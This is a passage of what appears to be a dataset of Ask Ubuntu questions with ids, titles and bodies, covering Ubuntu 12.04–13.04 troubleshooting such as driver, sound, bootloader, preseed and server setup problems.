kb of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe virtualbox-dkms all 4.1.12-dfsg-2ubuntu0.3 [ 676 kb ] fetched 676 kb in 2s ( 258 kb/s ) selecting previously unselected package virtualbox-dkms . ( reading database ... 458635 files and directories currently installed . ) unpacking virtualbox-dkms ( from ... /virtualbox-dkms_4.1.12-dfsg-2ubuntu0.3_all.deb ) ... setting up virtualbox-dkms ( 4.1.12-dfsg-2ubuntu0.3 ) ... loading new virtualbox-4.1.12 dkms files ... first installation : checking all kernels ... building only for 3.8.0-29-generic building initial module for 3.8.0-29-generic error ! bad return status for module build on kernel : 3.8.0-29-generic ( x86_64 ) consult /var/lib/dkms/virtualbox/4.1.12/build/make.log for more information . * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed .
342373	how to install windows 8 in ubuntu machine ?	i have a computer running ubuntu 12.04 and would like to dual boot windows 8 . is this possible without harming the ubuntu installation ? everywhere i have looked said to install windows 8 first . thanks
342376	missing fonts in xvfb	i 've installed ubuntu 12.04.3 64-bit as a guest under vmplayer running on my win7 host . after ubuntu installs , i launch and open a terminal . i then enter the following : sudo apt-get update sudo apt-get install wine sudo apt-get install xvfb sudo apt-get install xfonts-100dpi xfonts-75dpi xfonts-scalable xfonts-cyrillic when i launch xvfb , i get the following error : â [ dix ] could not init font path element /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , removing from list ! â '' x-ttcidfont-conf '' should have been installed with `` wine '' as i got the same eula when i install manually . however , it never gets recognized and when i check font folders , they 're empty . i 've tried these steps as well : alternate attempt 1 : sudo apt-get -y install x-ttcidfont-conf cabextract ttf-mscorefonts-installer sudo dpkg-reconfigure x-ttcidfont-conf alternate attempt 2 : reset ubuntu at login screen : press ctrlaltf1 login kill x server : sudo service lightdm stop generate new xorg.conf file : sudo x -configure this will create a 'xorg.conf.new ' file in your current dir return to gui : sudo start lightdm login through ui open & edit xorg.conf.new and add the following two lines : fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/cid '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' save & exit logout of ui at login screen : press ctrlaltf1 login kill x server : sudo service lightdm stop rename and move : sudo mv xorg.conf.new /etc/x11/xorg.conf return to gui : sudo start lightdm i fully admit i 'm a linux/ubuntu/xvfb noob ... but i am good at google searches and nothing seems to work . what am i missing ? i 've tried : sudo apt-get -y install x-ttcidfont-conf [ sudo ] password for < user > : reading package lists ... done building dependency tree reading state information ... done x-ttcidfont-conf is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 17 not - upgraded . and still get the same error message . i 've also tried : sudo apt-get upgrade restarted ubuntu retried get same results . : - ( there is an in-house shell script that launches xvfb followed by an application and apparently just hangs as a result . the first line in the shell script is : xvfb :2 & and simply executing that command outside of the shell script causes the same error . i 've read in one of the many pages to help resolve this that i need an xorg.conf in a folder to point to font folders . i tried to create this and for the other fonts such as xfont-100dpi , xfont-75dpi , etc . there is content in the folders . why am i not able to get any content in the equivalent font folder for x-ttcidfont-conf truetype font ?
342378	why wo n't the ubuntu 12.04 installer use my preseed file ?	here is my preseed file : d-i partman-auto/disk string /dev/sda d-i partman-auto/method string lvm d-i partman-lvm/device_remove_lvm boolean true d-i partman-lvm/device_remove_lvm_span boolean true d-i partman-auto/purge_lvm_from_device boolean true d-i partman-auto-lvm/guided_size string max d-i partman-md/device_remove_md boolean true d-i partman-auto-lvm/new_vg_name string vg0 d-i partman/alignment select cylinder d-i partman-auto/choose_recipe select boot-root d-i partman-auto/expert_recipe string \ boot-root : : \ 256 8000 256 ext2 \ $ primary { } \ $ bootable { } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext2 } \ mountpoint { /boot } . \ 30000 7000 1000000000 ext4 \ $ primary { } \ $ defaultignore { } \ method { lvm } \ device { /dev/sda } \ vg_name { vg0 } . \ 30000 5000 1000000000 ext4 \ $ lvmok { } \ in_vg { vg0 } \ lv_name { root } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { / } . \ 256 6000 512 swap \ $ lvmok { } \ in_vg { vg0 } \ lv_name { swap } \ method { swap } \ format { } . \ d-i partman/default_filesystem string ext4 d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman-md/confirm boolean true d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i partman-lvm/confirm boolean true d-i partman-lvm/confirm_nooverwrite boolean true so why does the installer completely ignore it and choose instead to do this : -- - logical volume -- - lv name /dev/vg0/root vg name vg0 lv uuid y8ceaf-szby-a3v3-wvhw-ub0r-r1oe-8sttuc lv write access read/write lv status available # open 1 lv size 1.76 gib current le 450 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv name /dev/vg0/swap_1 vg name vg0 lv uuid 63cl5q-udaq-zdtn-vry0-i638-uz1d-xskm8e lv write access read/write lv status available # open 2 lv size 8.00 gib current le 2048 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1
342379	will data in my new volume be encrypted if i mount it in my full disk encrypted system ?	i 've installed a ubuntu 12.04 server with full disk encryption . now , i added a new volume ( a md volume , integrated by 2 hdd in raid1 ) , and mounted it at root of my encrypted file system . will data on that new volume be encrypted as well as in the main file system , or do i need to encrypt it separately ? thanks , checho .
342381	updated to 13.04 , no ehci-pci ? how to unbind usb2 ?	i have a tascam us-144 audio interface . i got it to work with 12.04 and 12.10 by : echo -n 0000.00.1a.7 | sudo tee -a /sys/bus/pci/drivers/ehci_hcd/unbind now that directory , ehci_hcd doesnt exist under ubuntu 13.04 . it must 've been deleted during the update . i tried ehci-pci , ohci_hcd , uhci , and xhci but no luck . where did that directory go ? how do i unbind my usb2.0 without it ?
342388	where are lxc containers security borderlines ?	my question is around the security of an lxc container . if i am running multiple containers on my box , and give users a separate ssh access to their owned container , can any of those container hack into the other containers on that box or the even the host machine ? where are lxc containers security borderlines ?
342389	ca n't upgrade my old ubuntu system	i have a really old ubuntu system . probably somewhere around 2.0.3 or something . i went to update manager but it wont let me download the new system . i have tried looking online for individual downloads to work my way up to the software but i ca n't find them . i also have a lot of important things on my computer so i ca n't `` crash it '' and `` redownload ubuntu '' is there any way to upgrade my system or am i just screwed ... ?
342390	how do i install ubuntu through virtual box ?	i have set up ubuntu on virtual box . i have reached the stage where it says install or try ubuntu . when i press try , it takes me through a series of steps that i am not sure of , for example , partitions . i do not know which options to select .
342391	nexus 4 bootloader only	after trying to flash ubuntu on my nexus 4 , the process was some how interrupted and my phone is unusable except for the boot-loader.is there any one who can help with this ?
342392	incomplete file error while trying to install matlab	i 'm attempting to install matlab r2013a on my pc . i know it 's compatible because i have a 64-bit architecture . when i try to open the file after having downloaded matlab from my university 's website i receive the following message : archive : /home/chihiro/downloads/r2013a-linux-64.zip.crdownload [ /home/chihiro/downloads/r2013a-linux-64.zip.crdownload ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/chihiro/downloads/r2013a-linux-64.zip.crdownload or /home/chihiro/downloads/r2013a-linux-64.zip.crdownload.zip , and can not find /home/chihiro/downloads/r2013a-linux-64.zip.crdownload.zip , period . i 'm not sure what this means , but any hints would be appreciated since i just switched to linux and i 'm not used to how it operates yet .
342396	wireless keeps disconnecting in ubuntu 12.04.03	internet works fine with wired connection , but with wireless it keeps discontinuing . on windows , it works fine in both cases . i have installed ubuntu side by side to windows creating separate partition . following is result of lspci command : $ lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 08 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 08 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 0c:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) could anybody please help me on this issue ? i have gone through several threads , but did not find the exact solution .
342405	is it possible to use the wallpaper 's main color in a theme ?	is it possible to use the wallpaper 's main color ( the one used for unity ) in a theme ?
342408	why ca n't i get my nivida drivers to work	i 've tried everything : messing around in my xorg.conf file , purging my nvidia driver and reinstalling , updating my headers unplugging and plugging everything back in , ( turning on and off again ) enabling drivers manually , installing and uninstalling ubuntu-desktop and nvidia common , updating , upgrading , manual installs via .run , starting lightdm and startx . i figured our it was something to do with my video card setting to high of a resolution . after resetting that i at least got to the tty terminal . but nothing i did would bring up the gui . nothing . i 'm using a nvidia 560 gtx on ubuntu 12.04 lts . if there 's a single person who can help me i will give you a hug , put pizza in my hard drive , and e-mail it to you ! update used sgfxi ( good idea ) , now the only problem is that i ca n't get to my desktop . startx says it ca n't find a screen and after looking through the log it says failed to initialize the nvidia gpu at pci:1:0:0 . i have a desktop and all of the search results talk about bumblebee , which if i 'm not mistaken is for laptops with optimus . there 's a lot of info and i can make ends of it , but i do n't know what to look for . any help ( i ca n't paste from terminal because i have no idea how ) .
342410	reinstalling gallium drivers after downgrading	i am running ubuntu 13.04 . i tried foolishly to install the legacy ati drivers on my machine from some repository . i think i managed to remove them but now i am running only on vesa . does anyone have an idea how i can change my configuration such that x uses the gallium driver again ? package list is at http : //paste.ubuntu.com/6076883 and xorg.0.log herehttp : //paste.ubuntu.com/6076902 sudo lspci -nnk | grep -a5 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv610 [ radeon hd 2400 pro ] [ 1002:94c3 ] subsystem : dell radeon hd 2400 pro [ 1028:0302 ] 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 ) subsystem : asustek computer inc. wl-138g v2 / wl-138ge / wl-100ge [ 1043:100f ] kernel driver in use : wl update : ubuntu starts still into vesa after purging left over fglrx packages on the system and reinstalling the packages suggested . an xorg.conf is not automatically generated also not by a dpkg-reconfigure . i tried a sudo x -configure but the file created does not improve the situation . i can stop the service lightdm , then load the radeon module , start lightdm again and have then the desired result that the gallium driver is used and working . however , of course that does n't change the startup behavior . the current xorg.0.log can be found here http : //paste.ubuntu.com/6080770/ cat /proc/cmdline gives : boot_image=/boot/vmlinuz-3.8.0-30-generic root=uuid=e8b7c26b-537f-486c-b0f5-674f28c5bac0 ro quiet splash contents of /usr/share/x11/xorg.conf.d/ : 10-evdev.conf 50-synaptics.conf 51-synaptics-quirks.conf 11-evdev-quirks.conf 50-vmmouse.conf 11-evdev-trackpoint.conf 50-wacom.conf update : problem was solved after deleting /etc/modprobe.d/blacklist-fglrx.conf . this file prevented the right driver from getting loaded . somehow this was not deleted earlier .
342412	phablet-flash : error : too few arguments	i try to install ubuntu touch into my nexus 10 ( ver : 4.3 ) now i start to work on the 4th step - downloading & deploying image to device i wrote : phablet-flash ( cdimage-touch|cdimage-legacy|ubuntu-system|community ) -b then : bash : syntax error near unexpected token 'cdimage-touch' i wrote : phablet-flash -b then : usage : phablet-flash [ -h ] phablet-flash : error : too few arguments so what i should do next ?
342416	how to configure logitech performance mx 950 ?	i am completely new to ubuntu 13.04 and i do not have much experience using terminal . however , i would like to assign the `` zoom '' button on my performance mx mouse to show workspaces ... i find the particular button worthless for actually zooming in and out . i also want to assign the `` application button '' to `` spread windows '' ( at least what it is called in the unity tweak tool ) . how do i go about changing these settings permanently ?
342417	is there any usb modem that is supported by default in ubuntu ?	i need to buy an usb modem and also want to use it in ubuntu . it there any modem available that is supported by default and can be used without any hack ?
342420	can not play sound , alsa lib errors	edit added ls -l /dev/snd/ edit added amixer -c 0 im trying to get my ubuntu server 12.04 lts to play a soundfile . however i always get the following error , show from a speaker-test command . update i no longer get the following error , sound files will play ( had to add my user to the sound group ) , however no sound can be heard . speaker-test 1.0.25 playback device is default stream parameters are 48000hz , s16_le , 1 channels using 16 octaves of pink noise alsa lib confmisc.c:768 : ( parse_card ) can not find card '0' alsa lib conf.c:4241 : ( _snd_config_evaluate ) function snd_func_card_driver returned error : no such file or directory alsa lib confmisc.c:392 : ( snd_func_concat ) error evaluating strings alsa lib conf.c:4241 : ( _snd_config_evaluate ) function snd_func_concat returned error : no such file or directory alsa lib confmisc.c:1251 : ( snd_func_refer ) error evaluating name alsa lib conf.c:4241 : ( _snd_config_evaluate ) function snd_func_refer returned error : no such file or directory alsa lib conf.c:4720 : ( snd_config_expand ) evaluate error : no such file or directory alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm default playback open error : -2 , no such file or directory aplay -l **** list of playback hardware devices **** card 0 : cmi8738 [ c-media cmi8738 ] , device 0 : cmi8738-mc6 [ c-media pci dac/adc ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : cmi8738 [ c-media cmi8738 ] , device 1 : cmi8738-mc6 [ c-media pci 2nd dac ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : cmi8738 [ c-media cmi8738 ] , device 2 : cmi8738-mc6 [ c-media pci iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lspci -v | grep -a7 -i `` audio '' 01:00.0 multimedia audio controller : c-media electronics inc cmi8738/cmi8768 pci audio ( rev 10 ) subsystem : c-media electronics inc cmi8738/c3dx pci audio device flags : bus master , medium devsel , latency 64 , irq 21 i/o ports at de00 [ size=256 ] capabilities : < access denied > kernel driver in use : snd_cmipci kernel modules : snd-cmipci 01:08.0 ethernet controller : intel corporation 82562ez 10/100 ethernet controller ( rev 02 ) lsmod | grep snd snd_cmipci 39606 0 gameport 15088 1 snd_cmipci snd_pcm 85934 1 snd_cmipci snd_page_alloc 18398 1 snd_pcm snd_opl3_lib 18863 1 snd_cmipci snd_hwdep 13276 1 snd_opl3_lib snd_mpu401_uart 13865 1 snd_cmipci snd_seq_midi 13132 0 snd_rawmidi 25157 2 snd_mpu401_uart , snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51593 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 3 snd_pcm , snd_opl3_lib , snd_seq snd_seq_device 14137 4 snd_opl3_lib , snd_seq_midi , snd_rawmidi , snd_seq snd 57014 9 snd_cmipci , snd_pcm , snd_opl3_lib , snd_hwdep , snd_mpu401_uart , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd ls -l /dev/snd/ total 0 drwxr-xr-x 2 root root 60 sep 7 11:12 by-path crw-rw -- -t 1 root audio 116 , 8 sep 7 11:12 controlc0 crw-rw -- -t 1 root audio 116 , 7 sep 7 11:12 pcmc0d0c crw-rw -- -t 1 root audio 116 , 6 sep 7 11:12 pcmc0d0p crw-rw -- -t 1 root audio 116 , 5 sep 7 11:12 pcmc0d1c crw-rw -- -t 1 root audio 116 , 4 sep 7 11:12 pcmc0d2c crw-rw -- -t 1 root audio 116 , 3 sep 7 11:12 pcmc0d3c crw-rw -- -t 1 root audio 116 , 2 sep 7 11:12 pcmc0d4p crw-rw -- -t 1 root audio 116 , 1 sep 7 11:12 seq crw-rw -- -t 1 root audio 116 , 33 sep 7 11:12 timer amixer -c 0 simple mixer control 'master',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'master mono',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'master surround',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ off ] front right : playback 31 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'headphone jack sense',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'pcm',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] simple mixer control 'surround',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ off ] front right : playback 31 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'surround jack mode',0 capabilities : enum items : 'shared ' 'independent' item0 : 'shared' simple mixer control 'center',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'lfe',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'line',0 capabilities : pvolume pswitch cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] capture [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] capture [ off ] simple mixer control 'line jack sense',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'cd',0 capabilities : pvolume pswitch cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] capture [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] capture [ off ] simple mixer control 'mic',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : mono capture channels : front left - front right limits : playback 0 - 31 mono : playback 0 [ 0 % ] [ -34.50db ] [ off ] front left : capture [ on ] front right : capture [ on ] simple mixer control 'mic boost ( +20db ) ',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'mic select',0 capabilities : enum items : 'mic1 ' 'mic2' item0 : 'mic1' simple mixer control 'video',0 capabilities : cswitch cswitch-exclusive penum capture exclusive group : 0 capture channels : front left - front right front left : capture [ off ] front right : capture [ off ] simple mixer control 'phone',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : mono capture channels : front left - front right limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 12.00db ] [ off ] front left : capture [ off ] front right : capture [ off ] simple mixer control 'aux',0 capabilities : pvolume pswitch cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] capture [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] capture [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 15 front left : capture 0 [ 0 % ] [ 0.00db ] [ on ] front right : capture 0 [ 0 % ] [ 0.00db ] [ on ] simple mixer control 'mix',0 capabilities : cswitch cswitch-exclusive penum capture exclusive group : 0 capture channels : front left - front right front left : capture [ off ] front right : capture [ off ] simple mixer control 'mix mono',0 capabilities : cswitch cswitch-exclusive penum capture exclusive group : 0 capture channels : front left - front right front left : capture [ off ] front right : capture [ off ] simple mixer control 'channel mode',0 capabilities : enum items : '2ch ' '4ch ' '6ch' item0 : '2ch' simple mixer control 'downmix',0 capabilities : enum items : 'off ' '6 - > 4 ' '6 - > 2' item0 : 'off' simple mixer control 'exchange front/surround',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'external amplifier',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'high pass filter enable',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'spread front to surround and center/lfe',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'stereo mic',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'v_refout enable',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ]
342422	no operating system found	i was installing ubuntu ( 13.04 ) and it somehow whenver restarts to complete the install starts installing again ! ! ! so , i did not go ahead and wanted to use windows 7 which is already there on my vaio . but now , it says no operating system found ! ! would be glad if someone could help . ( actually it was saying many times during install that no device on port 2 or something like that ) ... thanks in advance
342424	ubuntu 12.10 minecraft bukkitt server settings/plugins	i recently installed a craftbukkit basic server on my ubuntu 12.10 system . note i did this without the desktop/gnome , all done on the command line . now that i have the basic server i really need help with on how to edit the server settings and how to install/edit the settings of the plugins . there really is n't anything i could find on google so i need all of your help .
342425	how to install ubuntu server 12.04 on a new hp microserver proliant gen8 g2020 ?	i am new to all of this . i have just bought a new hp proliant gen8 g2020t microserver . i want to install ubuntu 12.04 i386 version on the server . i have downloaded ubuntu 12.04 on a usb from this link : http : //www.ubuntu.com/download/server/thank-you ? distro=server & bits=32 & release=lts is this the right version ? i have powered the server and i get an option of f9 or f10 . which one do i choose ? could you please give me step by step instructions ? your help is appreciated in advance .
342431	ubuntu 12.04 intel graphics problem	my computer is dual booted with windows and ubuntu , windows works just fine , but when i installed ubuntu grey lines occupied a lot of the screen and spazing out making ubuntu barely noticeable , it says that my graphics are unknown but if i hop in windows i can see its a intel hd graphics family version 9.17.10.2867 i ca n't use ubuntu and i really want to , any help ? the output of lspci -nnk | grep vga -a2 is : vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0102 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103:2ac5 ] kernel driver in use : i915
342433	uget with aria2 plugin	i have read that uget with aria2 plugin enabled is the best downloader . so i tried . i downloaded uget from the ubuntu software center and also installed aria2 from the terminal . then i opened uget and opened settings > plugin section and activated `` enable aria2 plugin '' . my arguments read : -- enable-rpc=true -d -- check-certificate=false then when i clicked ok , it replied : failed to connect to aria2 . is aria2 shutdown ? or did the aria2 launch fail ? i also tried some commands from web : roshan @ roshan-aspire-4736z : ~ $ aria2c -- enable-rpc=true -- check-certificate=false -- disable-ipv6 2013-09-07 09:42:08.483317 error - ipv4 rpc : failed to bind port 6800 exception : [ socketcore.cc:308 ] errorcode=1 failed to bind a socket , cause : address already in use 2013-09-07 09:42:08.483629 error - exception caught exception : [ downloadenginefactory.cc:181 ] errorcode=1 failed to setup rpc server then i opened youtube and tried to download a video . it wo n't download and at the bottom there was this message : message : aria2.getversion result error please help me with this . i really need t have aria2 plugin working . thank you .
342434	find what packages are installed from a repository	i 'm trying to find what packages i have installed from a repository using terminal commands . i found a post somewhere saying i could use aptitude search `` ? origin ( < repository > ) ? installed '' , but i could n't get it working . i tried searching for a packages that came from ppa : ubuntu-wine/ppa and got nothing with these : aptitude search `` ? origin ( http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ ) ? installed '' aptitude search `` ? origin ( http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ ) ? installed '' aptitude search `` ? origin ( http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ raring/main ) ? installed '' it would be nice if i could get something that works with ppas .
342438	trying to understand my first server set up	i am trying to set up my first server and stack . i spent a week trying to do it on a virtual machine but could never get the ports to forward correctly so today i just dedicated the full machine . i installed ubuntu server and followed the directions to install the lamp stack . everything worked perfectly . i configured my router , got the apache welcome page , installed an ssh server , connected from a remote terminal , then connected with sftp and updated the index.html file . it 's progress but i still feel pretty lost . my biggest frustration is that i do n't see anything when i am logged directly into ubuntu from the terminal . i run ls and expect to see directories for apache and mysql but i see nothing . it 's like i am look at an empty drive . maybe i am . at first , i thought i could create a public_html directory and scp files into it , but that did n't work . ( well , it worked but they were n't visible at the ip . ) then i discovered that i should probably work with the default directory structure /var/www only i ca n't see it from terminal ? i do see it when i log on with filezilla . i do n't get why i see it via sftp but not via ssh or directly on the server . i read through all the official documentation but it seems to take these basic issues for granted . maybe someone can point me to other resources . i 've been googling all day but not finding what i need to understand this better .
342449	usb pam login with sd card	i am trying to set up a pam login token . i want to use an sd card instead of a normal usb flash disk . when i run the pamusb-conf to set up a new device , with the sd card inserted , it says that there is no device detected . the sd card reader works fine in other respects ( able to access through the gui and through /media in terminal ) . i run pamusb-conf in verbose mode and just get the following : $ sudo pamusb-conf -- verbose -- add-device sdauth inspecting /org/freedesktop/udisks/devices/sda invalid : not a removable device inspecting /org/freedesktop/udisks/devices/sr0 invalid : device does not contain any volume inspecting /org/freedesktop/udisks/devices/mmcblk0 invalid : not a removable device inspecting /org/freedesktop/udisks/devices/dm_2d0 invalid : not a removable device inspecting /org/freedesktop/udisks/devices/sda1 invalid : not a removable device inspecting /org/freedesktop/udisks/devices/sda2 invalid : not a removable device inspecting /org/freedesktop/udisks/devices/mmcblk0p1 invalid : not a removable device inspecting /org/freedesktop/udisks/devices/sda5 invalid : not a removable device inspecting /org/freedesktop/udisks/devices/sdb invalid : device does not contain any volume no devices detected . try running in verbose ( -v ) mode to see what 's going on . pamusb-conf works fine with a normal usb pendrive . how can i make it so that i can use an sd card for pamusb ? thanks .
342450	ubuntu software updater randomly popping up	i do n't know why but it randomly pops up sometimes every hour sometimes every 30 minutes with the message `` the software is up to date ''
342455	is it possible for checking package of ubuntu 13.10 in 13.04 or 12.04 ?	i most often do shift between home ubuntu 13.04 and my organization ubuntu 12.04 . so to test the packages in development mode i cant move for ubuntu 13.10 everytime . is there any environment where i can test the development versions for bugs and crashes in the current stable releases only with out installing 13.10 . thank you .
342456	how can i change the language of flareget to english ?	i installed flareget from the ubuntu software center , but found that the language is not english . it is in spanish or french or something , i do n't know . how can i change the language of flareget to english ?
342458	how to boot from another disk with grub2	i bought a new disk ( /dev/sdb ) and decided to install xubuntu 13.04 along with windows 7 installed on /dev/sda . i used custom partitioning during installation , created 100gb partition on /dev/sdb and choosed to install bootloader to /dev/sda . my disks are : disk /dev/sda : 512gb partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 503gb 503gb primary ntfs disk /dev/sdb : 3001gb partition table : gpt number start end size file system name flags 1 1049kb 99.6mb 98.6mb fat32 boot 4 99.6mb 100gb 99.9gb ext4 2 100gb 108gb 8000mb linux-swap ( v1 ) 3 108gb 3001gb 2893gb ntfs basic data partition disk /dev/sdc : 1000gb partition table : msdos number start end size type file system flags 1 1049kb 1000gb 1000gb primary ntfs now i have multiple boot options in bios : 3 disks , ubuntu and windows . i can boot windows if i choose to boot from 512gb disk , but if i choose ubuntu/windows options , grub2 loads with ubuntu and windows options , but only ubuntu is bootable . windows option says about invalid efi file path . as far as i understand , it is an error of chainloader command . here is the full windows 7 entry : # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( đ˝đ° /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-3c0009460009089a ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 -- hint='hd0 , msdos1 ' 3c0009460009089a else search -- no-floppy -- fs-uuid -- set=root 3c0009460009089a fi chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # could you tell me what have to be done to make windows 7 bootable from grub2 ? i know that search command returns hd0 , msdos1 and it seems to be valid , because i can boot windows 7 if /dev/sda is selected as primary boot device in bios . update : ls ( hd0 , msdos1 ) returns some $ ... entries and /boot directory with memtest.exe and other files , but i ca n't find there any *.efi image . ls ( hd1 , gpt1 ) /efi returns ubuntu , microsoft , boot , refind , tools , but passing either of ubuntu/*.efi or microsoft/*.efi to chainloader results in booting to grub2 menu . refind also can boot only ubuntu .
342459	script or command line for enabling/disabling touch pad	is it possible for someone to help me out with my problem ? i would like to know whether it is possible to enable/disable touch pad using command line or via scripting ?
342461	are servers like apache2 offline by default ?	meaning they can only be accessed from localhost , and not from a different machine .
